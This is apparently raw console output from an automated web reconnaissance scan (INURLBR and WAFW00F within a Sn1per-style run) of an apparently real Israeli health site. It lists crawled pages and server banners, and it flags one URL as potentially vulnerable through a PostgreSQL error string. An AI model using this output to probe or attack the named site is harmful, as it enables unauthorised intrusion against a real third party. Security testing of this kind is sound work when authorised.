[1;37m|_[ + ] [[1;37m 31 / 63 [1;37m][0;37m-[23:36:20][1;37m [ - ] [0m
[1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m http://www.doctorarik.co.il/index.php/child/childlinks/[1;37m ][0m
[1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
[1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: Microsoft-IIS/7.5  X-Powered-By: ASP.NET, IP:62.219.91.10:80 [1;37m
[1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m / -  / , ISP: [1;37m
[1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
[1;37m|_[ + ] [0m[1;30mERROR CONECTION:: [1;33mOperation timed out after 5000 milliseconds with 7837 out of 15340 bytes received[0m
[1;37m
[1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
[1;37m|_[ + ] [[1;37m 32 / 63 [1;37m][0;37m-[23:36:25][1;37m [ - ] [0m
[1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m http://www.doctorarik.co.il/index.php/child/childcustomers/[1;37m ][0m
[1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
[1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: Microsoft-IIS/7.5  X-Powered-By: ASP.NET, IP:62.219.91.10:80 [1;37m
[1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m / -  / , ISP: [1;37m
[1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
[1;37m
[1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
[1;37m|_[ + ] [[1;37m 33 / 63 [1;37m][0;37m-[23:36:29][1;37m [ ! ] [0m
[1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m [32m( POTENTIALLY VULNERABLE )[0m  [1m [32mhttp://www.doctorarik.co.il/20170629102001-nyv-472.html[1;37m ][0m
[1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
[1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37m[32mHTTP/1.1 200 OK, Server: Microsoft-IIS/7.5  X-Powered-By: ASP.NET, IP:62.219.91.10:80 [1;37m
[1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m[32m / -  / , ISP: [1;37m
[1;37m|_[ + ] [0m[1;30mFound:: [0;37m[32m POSTGRESQL-06  -  VALUE: pg_[0m
[1;37m|_[ + ][1;30m VALUE SAVED IN THE FILE::[0;37m inurlbr-doctorarik.co.il.txt[0m
[1;37m
[1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
[1;37m|_[ + ] [[1;37m 34 / 63 [1;37m][0;37m-[23:36:37][1;37m [ - ] [0m
[1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m http://www.doctorarik.co.il/index.php/adult/adult-articles/[1;37m ][0m
[1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
[1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: Microsoft-IIS/7.5  X-Powered-By: ASP.NET, IP:62.219.91.10:80 [1;37m
[1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m / -  / , ISP: [1;37m
[1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
[1;37m|_[ + ] [0m[1;30mERROR CONECTION:: [1;33mOperation timed out after 5000 milliseconds with 15925 out of 20385 bytes received[0m
[1;37m
[1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
[1;37m|_[ + ] [[1;37m 35 / 63 [1;37m][0;37m-[23:36:43][1;37m [ - ] [0m
[1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m http://www.doctorarik.co.il/index.php/adult/adults-recipes/[1;37m ][0m
[1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
[1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: Microsoft-IIS/7.5  X-Powered-By: ASP.NET, IP:62.219.91.10:80 [1;37m
[1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m / -  / , ISP: [1;37m
[1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
[1;37m|_[ + ] [0m[1;30mERROR CONECTION:: [1;33mOperation timed out after 5000 milliseconds with 14577 out of 20851 bytes received[0m
[1;37m
[1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
[1;37m|_[ + ] [[1;37m 36 / 63 [1;37m][0;37m-[23:36:52][1;37m [ - ] [0m
[1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m http://www.doctorarik.co.il/index.php/adult/the-right-diet/[1;37m ][0m
[1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
[1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: Microsoft-IIS/7.5  X-Powered-By: ASP.NET, IP:62.219.91.10:80 [1;37m
[1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m / -  / , ISP: [1;37m
[1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
[1;37m|_[ + ] [0m[1;30mERROR CONECTION:: [1;33mOperation timed out after 5000 milliseconds with 10533 out of 26817 bytes received[0m
[1;37m
[1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
[1;37m|_[ + ] [[1;37m 37 / 63 [1;37m][0;37m-[23:36:58][1;37m [ - ] [0m
[1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m http://www.doctorarik.co.il/index.php/child/mobile-links/[1;37m ][0m
[1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
[1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: Microsoft-IIS/7.5  X-Powered-By: ASP.NET, IP:62.219.91.10:80 [1;37m
[1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m / -  / , ISP: [1;37m
[1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
[1;37m
[1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
[1;37m|_[ + ] [[1;37m 38 / 63 [1;37m][0;37m-[23:37:04][1;37m [ - ] [0m
[1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m http://www.doctorarik.co.il/index.php/adult-articles/breakfastimportant/510/[1;37m ][0m
[1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
[1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: Microsoft-IIS/7.5  X-Powered-By: ASP.NET, IP:62.219.91.10:80 [1;37m
[1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m / -  / , ISP: [1;37m
[1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
[1;37m
[1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
[1;37m|_[ + ] [[1;37m 39 / 63 [1;37m][0;37m-[23:37:09][1;37m [ - ] [0m
[1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m http://www.doctorarik.co.il/index.php/adult/sport-for-diet/[1;37m ][0m
[1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
[1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: Microsoft-IIS/7.5  X-Powered-By: ASP.NET, IP:62.219.91.10:80 [1;37m
[1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m / -  / , ISP: [1;37m
[1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
[1;37m
[1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
[1;37m|_[ + ] [[1;37m 40 / 63 [1;37m][0;37m-[23:37:15][1;37m [ - ] [0m
[1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m http://www.doctorarik.co.il/index.php/adult-articles/healtheatright/588/[1;37m ][0m
[1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
[1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: Microsoft-IIS/7.5  X-Powered-By: ASP.NET, IP:62.219.91.10:80 [1;37m
[1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m / -  / , ISP: [1;37m
[1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
[1;37m
[1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
[1;37m|_[ + ] [[1;37m 41 / 63 [1;37m][0;37m-[23:37:19][1;37m [ - ] [0m
[1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m http://www.doctorarik.co.il/index.php/adult-articles/justcloths/208/[1;37m ][0m
[1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
[1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: Microsoft-IIS/7.5  X-Powered-By: ASP.NET, IP:62.219.91.10:80 [1;37m
[1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m / -  / , ISP: [1;37m
[1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
[1;37m
[1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
[1;37m|_[ + ] [[1;37m 42 / 63 [1;37m][0;37m-[23:37:26][1;37m [ - ] [0m
[1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m http://www.doctorarik.co.il/index.php/adult-articles/hardonwinter/214/[1;37m ][0m
[1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
[1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: Microsoft-IIS/7.5  X-Powered-By: ASP.NET, IP:62.219.91.10:80 [1;37m
[1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m / -  / , ISP: [1;37m
[1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
[1;37m
[1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
[1;37m|_[ + ] [[1;37m 43 / 63 [1;37m][0;37m-[23:37:29][1;37m [ - ] [0m
[1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m http://www.doctorarik.co.il/wp-login.php?action=lostpassword[1;37m ][0m
[1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
[1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: Microsoft-IIS/7.5  X-Powered-By: ASP.NET, IP:62.219.91.10:80 [1;37m
[1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m / -  / , ISP: [1;37m
[1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
[1;37m
[1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
[1;37m|_[ + ] [[1;37m 44 / 63 [1;37m][0;37m-[23:37:35][1;37m [ - ] [0m
[1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m http://www.doctorarik.co.il/index.php/adult-articles/adult-article2/150/[1;37m ][0m
[1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
[1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: Microsoft-IIS/7.5  X-Powered-By: ASP.NET, IP:62.219.91.10:80 [1;37m
[1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m / -  / , ISP: [1;37m
[1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
[1;37m
[1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
[1;37m|_[ + ] [[1;37m 45 / 63 [1;37m][0;37m-[23:37:42][1;37m [ - ] [0m
[1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m http://www.doctorarik.co.il/index.php/adults-recipes/recipe-3/289/[1;37m ][0m
[1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
[1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: Microsoft-IIS/7.5  X-Powered-By: ASP.NET, IP:62.219.91.10:80 [1;37m
[1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m / -  / , ISP: [1;37m
[1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
[1;37m|_[ + ] [0m[1;30mERROR CONECTION:: [1;33mOperation timed out after 5000 milliseconds with 9185 out of 15884 bytes received[0m
[1;37m
[1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
[1;37m|_[ + ] [[1;37m 46 / 63 [1;37m][0;37m-[23:37:49][1;37m [ - ] [0m
[1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m http://www.doctorarik.co.il/index.php/kids-recipes/kids_recipe-10/334/[1;37m ][0m
[1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
[1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: Microsoft-IIS/7.5  X-Powered-By: ASP.NET, IP:62.219.91.10:80 [1;37m
[1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m / -  / , ISP: [1;37m
[1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
[1;37m|_[ + ] [0m[1;30mERROR CONECTION:: [1;33mOperation timed out after 5000 milliseconds with 6489 out of 15976 bytes received[0m
[1;37m
[1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
[1;37m|_[ + ] [[1;37m 47 / 63 [1;37m][0;37m-[23:37:56][1;37m [ - ] [0m
[1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m http://www.doctorarik.co.il/index.php/adults-recipes/recipe-6/298/[1;37m ][0m
[1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
[1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: Microsoft-IIS/7.5  X-Powered-By: ASP.NET, IP:62.219.91.10:80 [1;37m
[1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m / -  / , ISP: [1;37m
[1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
[1;37m|_[ + ] [0m[1;30mERROR CONECTION:: [1;33mOperation timed out after 5000 milliseconds with 6489 out of 16015 bytes received[0m
[1;37m
[1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
[1;37m|_[ + ] [[1;37m 48 / 63 [1;37m][0;37m-[23:38:02][1;37m [ - ] [0m
[1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m http://www.doctorarik.co.il/index.php/adults-recipes/recipe-2/218/[1;37m ][0m
[1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
[1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: Microsoft-IIS/7.5  X-Powered-By: ASP.NET, IP:62.219.91.10:80 [1;37m
[1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m / -  / , ISP: [1;37m
[1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
[1;37m
[1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
[1;37m|_[ + ] [[1;37m 49 / 63 [1;37m][0;37m-[23:38:07][1;37m [ - ] [0m
[1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m http://www.doctorarik.co.il/index.php/kids-recipes/kids_recipe-8/330/[1;37m ][0m
[1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
[1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: Microsoft-IIS/7.5  X-Powered-By: ASP.NET, IP:62.219.91.10:80 [1;37m
[1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m / -  / , ISP: [1;37m
[1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
[1;37m
[1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
[1;37m|_[ + ] [[1;37m 50 / 63 [1;37m][0;37m-[23:38:14][1;37m [ - ] [0m
[1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m http://www.doctorarik.co.il/index.php/kids-recipes/kids_recipe-7/328/[1;37m ][0m
[1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
[1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: Microsoft-IIS/7.5  X-Powered-By: ASP.NET, IP:62.219.91.10:80 [1;37m
[1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m / -  / , ISP: [1;37m
[1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
[1;37m|_[ + ] [0m[1;30mERROR CONECTION:: [1;33mOperation timed out after 5000 milliseconds with 13229 out of 15375 bytes received[0m
[1;37m
[1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
[1;37m|_[ + ] [[1;37m 51 / 63 [1;37m][0;37m-[23:38:21][1;37m [ - ] [0m
[1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m http://www.doctorarik.co.il/index.php/adult-articles/adult-article1/145/[1;37m ][0m
[1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
[1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: Microsoft-IIS/7.5  X-Powered-By: ASP.NET, IP:62.219.91.10:80 [1;37m
[1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m / -  / , ISP: [1;37m
[1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
[1;37m|_[ + ] [0m[1;30mERROR CONECTION:: [1;33mOperation timed out after 5000 milliseconds with 10533 out of 16848 bytes received[0m
[1;37m
[1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
[1;37m|_[ + ] [[1;37m 52 / 63 [1;37m][0;37m-[23:38:25][1;37m [ - ] [0m
[1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m http://www.doctorarik.co.il/index.php/adults-recipes/recipe-5/296/[1;37m ][0m
[1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
[1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: Microsoft-IIS/7.5  X-Powered-By: ASP.NET, IP:62.219.91.10:80 [1;37m
[1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m / -  / , ISP: [1;37m
[1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
[1;37m
[1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
[1;37m|_[ + ] [[1;37m 53 / 63 [1;37m][0;37m-[23:38:29][1;37m [ - ] [0m
[1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m http://www.doctorarik.co.il/index.php/adults-recipes/recipe-7/300/[1;37m ][0m
[1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
[1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: Microsoft-IIS/7.5  X-Powered-By: ASP.NET, IP:62.219.91.10:80 [1;37m
[1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m / -  / , ISP: [1;37m
[1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
[1;37m
[1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
[1;37m|_[ + ] [[1;37m 54 / 63 [1;37m][0;37m-[23:38:32][1;37m [ - ] [0m
[1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m http://www.doctorarik.co.il/index.php/adults-recipes/recipe-10/307/[1;37m ][0m
[1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
[1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: Microsoft-IIS/7.5  X-Powered-By: ASP.NET, IP:62.219.91.10:80 [1;37m
[1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m / -  / , ISP: [1;37m
[1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
[1;37m
[1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
[1;37m|_[ + ] [[1;37m 55 / 63 [1;37m][0;37m-[23:38:36][1;37m [ - ] [0m
[1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m http://www.doctorarik.co.il/index.php/adults-recipes/recipe-9/305/[1;37m ][0m
[1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
[1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: Microsoft-IIS/7.5  X-Powered-By: ASP.NET, IP:62.219.91.10:80 [1;37m
[1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m / -  / , ISP: [1;37m
[1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
[1;37m
[1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
[1;37m|_[ + ] [[1;37m 56 / 63 [1;37m][0;37m-[23:38:40][1;37m [ - ] [0m
[1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m http://www.doctorarik.co.il/index.php/kids-recipes/kids_recipe-5/324/[1;37m ][0m
[1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
[1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: Microsoft-IIS/7.5  X-Powered-By: ASP.NET, IP:62.219.91.10:80 [1;37m
[1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m / -  / , ISP: [1;37m
[1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
[1;37m
[1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
[1;37m|_[ + ] [[1;37m 57 / 63 [1;37m][0;37m-[23:38:43][1;37m [ - ] [0m
[1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m http://www.doctorarik.co.il/index.php/adults-recipes/recipe-4/292/[1;37m ][0m
[1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
[1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: Microsoft-IIS/7.5  X-Powered-By: ASP.NET, IP:62.219.91.10:80 [1;37m
[1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m / -  / , ISP: [1;37m
[1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
[1;37m
[1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
[1;37m|_[ + ] [[1;37m 58 / 63 [1;37m][0;37m-[23:38:47][1;37m [ - ] [0m
[1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m http://www.doctorarik.co.il/index.php/adults-recipes/recipe-11/309/[1;37m ][0m
[1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
[1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: Microsoft-IIS/7.5  X-Powered-By: ASP.NET, IP:62.219.91.10:80 [1;37m
[1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m / -  / , ISP: [1;37m
[1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
[1;37m
[1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
[1;37m|_[ + ] [[1;37m 59 / 63 [1;37m][0;37m-[23:38:51][1;37m [ - ] [0m
[1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m http://www.doctorarik.co.il/index.php/kids-recipes/kids_recipe-11/336/[1;37m ][0m
[1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
[1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: Microsoft-IIS/7.5  X-Powered-By: ASP.NET, IP:62.219.91.10:80 [1;37m
[1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m / -  / , ISP: [1;37m
[1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
[1;37m
[1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
[1;37m|_[ + ] [[1;37m 60 / 63 [1;37m][0;37m-[23:38:54][1;37m [ - ] [0m
[1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m http://www.doctorarik.co.il/index.php/kids-recipes/kids_recipe-2/314/[1;37m ][0m
[1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
[1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: Microsoft-IIS/7.5  X-Powered-By: ASP.NET, IP:62.219.91.10:80 [1;37m
[1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m / -  / , ISP: [1;37m
[1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
[1;37m
[1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
[1;37m|_[ + ] [[1;37m 61 / 63 [1;37m][0;37m-[23:38:58][1;37m [ - ] [0m
[1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m http://www.doctorarik.co.il/index.php/adults-recipes/recipe-8/303/[1;37m ][0m
[1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
[1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: Microsoft-IIS/7.5  X-Powered-By: ASP.NET, IP:62.219.91.10:80 [1;37m
[1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m / -  / , ISP: [1;37m
[1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m
[1;37m
[1;37m _[ - ][1;30m::[1;37m--------------------------------------------------------------------------------------------------------------[0m[0m
[1;37m|_[ + ] [[1;37m 62 / 63 [1;37m][0;37m-[23:39:02][1;37m [ - ] [0m
[1;37m|_[ + ] [0m[1;30mTarget:: [1;37m[[0;37m http://www.doctorarik.co.il/index.php/kids-recipes/kids_recipe-3/316/[1;37m ][0m
[1;37m|_[ + ] [0m[1;30mExploit:: [0m[1;31m[0m
[1;37m|_[ + ] [0m[1;30mInformation Server:: [0m[0;37mHTTP/1.1 200 OK, Server: Microsoft-IIS/7.5  X-Powered-By: ASP.NET, IP:62.219.91.10:80 [1;37m
[1;37m|_[ + ] [0m[1;30mMore details:: [0m[0;37m / -  / , ISP: [1;37m
[1;37m|_[ + ] [0m[1;30mFound:: [0;37mUNIDENTIFIED[0m

[1;37m[ INFO ] [ Shutting down ][0m
[1;37m[ INFO ] [ End of process INURLBR at [30-12-2017 23:39:02][0m
[1;37m[ INFO ] [0m[02;31m[ TOTAL FILTERED VALUES ]::[1;37m [ 1 ][0m
[1;37m[ INFO ] [02;31m[ OUTPUT FILE ]::[1;37m [ /usr/share/sniper/output/inurlbr-doctorarik.co.il.txt  ][0m
[1;37m|_________________________________________________________________________________________[0m
http://www.doctorarik.co.il/20170629102001-nyv-472.html

[1;37m\_________________________________________________________________________________________/[0m

[91m + -- --=[Port 110 closed... skipping.[0m
[91m + -- --=[Port 111 closed... skipping.[0m
[91m + -- --=[Port 135 closed... skipping.[0m
[91m + -- --=[Port 139 closed... skipping.[0m
[91m + -- --=[Port 161 closed... skipping.[0m
[91m + -- --=[Port 162 closed... skipping.[0m
[91m + -- --=[Port 389 closed... skipping.[0m
[93m + -- --=[Port 443 opened... running tests...[0m
[92m + -- ----------------------------=[Checking for WAF]=------------------------ -- +[0m

                                 ^     ^
        _   __  _   ____ _   __  _    _   ____
       ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
      | V V // o // _/ | V V // 0 // 0 // _/
      |_n_,'/_n_//_/   |_n_,' \_,' \_,'/_/
                                <
                                 ...'

    WAFW00F - Web Application Firewall Detection Tool

    By Sandro Gauci && Wendel G. Henrique

Checking https://doctorarik.co.il

[92m + -- ----------------------------=[Checking Cloudflare]=--------------------- -- +[0m
[92m + -- ----------------------------=[Gathering HTTP Info]=--------------------- -- +[0m
[1m[34mhttps://doctorarik.co.il[0m [404 Not Found] [1m[37mCountry[0m[[37mISRAEL[0m][[1m[31mIL[0m], [1m[37mHTTPServer[0m[[1m[36mMicrosoft-HTTPAPI/2.0[0m], [1m[37mIP[0m[[37m62.219.91.10[0m], [1m[37mMicrosoft-HTTPAPI[0m[[1m[32m2.0[0m], [1m[37mTitle[0m[[1m[33mNot Found[0m]

[92m + -- ----------------------------=[Gathering SSL/TLS Info]=------------------ -- +[0m
Version: [32m1.11.10-static[0m
